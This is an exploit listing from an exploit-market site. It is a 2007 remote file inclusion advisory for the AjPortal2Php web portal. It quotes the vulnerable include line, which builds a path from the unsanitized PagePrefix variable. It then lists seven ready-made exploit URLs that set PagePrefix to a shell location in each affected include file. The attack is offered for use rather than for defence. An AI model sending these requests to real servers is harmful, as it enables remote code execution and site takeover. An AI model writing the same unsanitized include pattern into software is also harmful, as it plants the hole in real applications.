[ authorization ] [ registration ] [ restore account ]
Contact us
You can contact us by:
0day Today Exploits Market and 0day Exploits Database

AjPortal2Php (PagePrefix) Remote File Inclusion Vulnerabilities

Author
Alkomandoz Hacker
Risk
[
Security Risk Unsored
]
0day-ID
0day-ID-1769
Category
web applications
Date add
16-04-2007
Platform
unsorted
===============================================================
AjPortal2Php (PagePrefix) Remote File Inclusion Vulnerabilities
===============================================================



#   [ AjPortal2Php]

# Class:     File Include Vulnerability

# Remote:    Yes

# Site: http://www.ajlopez.com/downloads/AjPortal2Php.zip

# Author:    Alkomandoz Hacker

#############################################################

file ;

begin.inc.php
connection.inc.php
events.inc.php
footer.inc.php
header.inc.php
menuleft.inc.php
pages.inc.php


======================================================
Vuln Code

include_once($PagePrefix.'includes/configuration.inc.php');



=======================================================
Exploit :

[AjPortal2Php _path]/includes/begin.inc.php?PagePrefix=Shell
[AjPortal2Php _path]/includes/connection.inc.php?PagePrefix=Shell
[AjPortal2Php _path]/includes/events.inc.php?PagePrefix=Shell
[AjPortal2Php _path]/includes/footer.inc.php?PagePrefix=Shell
[AjPortal2Php _path]/includes/header.inc.php?PagePrefix=Shell
[AjPortal2Php _path]/includes/menuleft.inc.php?PagePrefix=Shell
[AjPortal2Php _path]/includes/pages.inc.php?PagePrefix=Shell




#  0day.today [2024-10-06]  #